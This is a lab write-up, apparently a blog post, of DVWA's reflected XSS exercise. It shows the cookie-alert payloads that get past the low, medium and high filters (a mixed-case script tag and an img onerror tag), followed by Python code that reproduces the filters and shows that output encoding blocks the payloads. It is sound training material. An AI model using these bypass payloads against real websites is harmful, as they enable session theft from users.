DVWA - XSS (Reflected) (low, medium, high)
2017-01-06 17:18
low
No validation at all; inject <script>alert(document.cookie)</script> directly.
medium
Looking at the source shows that the <script> tag is filtered: $name = str_replace( '<script>', '', $_GET[ 'name' ] );
Bypass idea: uppercase. str_replace is case-sensitive, so a differently cased opening tag is left untouched.
<Script>alert(document.cookie)</script>
high
Looking at the source, a regex is used to filter: $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
Bypass idea: there are many tags, so just use a different one. Here img is used.
<img src=1 onerror=alert(document.cookie)>
[This is another quirk; I feel this regex could be bypassed head-on. Passers-by, please advise, thank you!]
Note: Chrome in its default configuration will not execute the alert; test in another browser.
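The three filters above, reimplemented in Python so the behaviour can be checked offline. This is an added example, not code from the post or from DVWA: str.replace and re.sub stand in for the PHP str_replace and preg_replace lines quoted above, the payloads are the ones the post uses, and the output-encoding fix (html.escape, the counterpart of PHP's htmlspecialchars) is my addition to show what a blacklist cannot do. The point for a defender: the medium and high levels remove specific strings from the input, while only encoding at output time makes every payload inert.

```python
import html
import re

# Constructed inputs: the payload the post uses at each DVWA level
PAYLOADS = {
    "low": "<script>alert(document.cookie)</script>",
    "medium": "<Script>alert(document.cookie)</script>",
    "high": "<img src=1 onerror=alert(document.cookie)>",
}


def filter_low(name: str) -> str:
    # low: no validation, input is echoed as-is
    return name


def filter_medium(name: str) -> str:
    # medium: str_replace('<script>', '', ...) -- case-sensitive, removes only this exact string
    return name.replace("<script>", "")


def filter_high(name: str) -> str:
    # high: preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', ...)
    # strips anything from '<' up to the letters s,c,r,i,p,t appearing in that order
    return re.sub(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", "", name, flags=re.IGNORECASE)


FILTERS = {"low": filter_low, "medium": filter_medium, "high": filter_high}


def filtered(level: str, name: str) -> str:
    """Apply the input filter of the given DVWA level."""
    return FILTERS[level](name)


def escape_output(name: str) -> str:
    """Mitigation (not on the page): encode at output time instead of blacklisting input."""
    return html.escape(name, quote=True)


def has_tag(fragment: str) -> bool:
    """True if the fragment still contains something an HTML parser would open as a tag."""
    return re.search(r"<[A-Za-z]", fragment) is not None


def bypasses(level: str, payload: str) -> bool:
    """True if the payload survives the level's filter with a live tag intact."""
    return has_tag(filtered(level, payload))


def render(level: str, name: str) -> str:
    """The 'Hello <name>' fragment DVWA echoes, after the level's filter only."""
    return f"<pre>Hello {filtered(level, name)}</pre>"


def render_safe(name: str) -> str:
    """Same fragment with output encoding; no tag can survive this regardless of input."""
    return f"<pre>Hello {escape_output(name)}</pre>"


if __name__ == "__main__":
    for level, payload in PAYLOADS.items():
        print(f"{level:6} filter -> {filtered(level, payload)!r}  bypassed={bypasses(level, payload)}")
    print("encoded        ->", render_safe(PAYLOADS["high"]))
```

Running it shows the medium filter leaving the mixed-case payload untouched, the high regex reducing the script payloads to a stray ">" while letting the img payload through unchanged, and the encoded output carrying no "<" at all.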